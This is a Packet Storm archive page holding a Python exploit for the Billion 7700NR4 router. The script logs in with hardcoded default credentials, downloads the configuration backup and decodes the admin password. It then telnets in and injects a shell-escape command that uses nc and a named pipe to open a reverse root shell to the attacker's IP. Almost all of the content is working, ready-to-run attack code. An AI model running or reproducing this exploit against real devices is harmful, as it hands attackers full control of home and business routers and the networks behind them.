Twenty Year Anniversary

Billion Router 7700NR4 Remote Root Command Execution

Billion Router 7700NR4 Remote Root Command Execution
Posted Oct 6, 2016
Authored by R-73eN

Billion Router 7700NR4 remote root command execution exploit.

tags | exploit, remote, root
MD5 | 15e010bb992939c9ca464a23d7e0033b

Billion Router 7700NR4 Remote Root Command Execution

Change Mirror Download

# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these
# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.
#

import requests
import base64
import socket
import time

host = ""
def_user = "user"
def_pass = "user"
reverse_ip = ""
#Banner
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner


# limited shell escape
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'

def execute_payload(password):
print "[+] Please run nc -lvp 1337 and then press any key [+]"
raw_input()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,23))
s.recv(1024)
s.send("admin\r")
a= s.recv(1024)
time.sleep(1)
s.send(password +"\r")
time.sleep(1)
s.recv(1024)
s.send(evil + "\r")
time.sleep(1)
print "[+] If everything worked you should get a reverse shell [+]"
print "[+] Warning pressing any key will close the SHELL [+]"
raw_input()




r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
if(r.status_code == 200):
print "[+] Seems the exploit worked [+]"
print "[+] Dumping data . . . [+]"
temp = r.text
admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
# print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
execute_payload(str(base64.b64decode(admin_pass)))
else:
print "[-] Exploit Failed [-]"
print "\n[+] https://www.infogen.al/ [+]\n\n"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    32 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close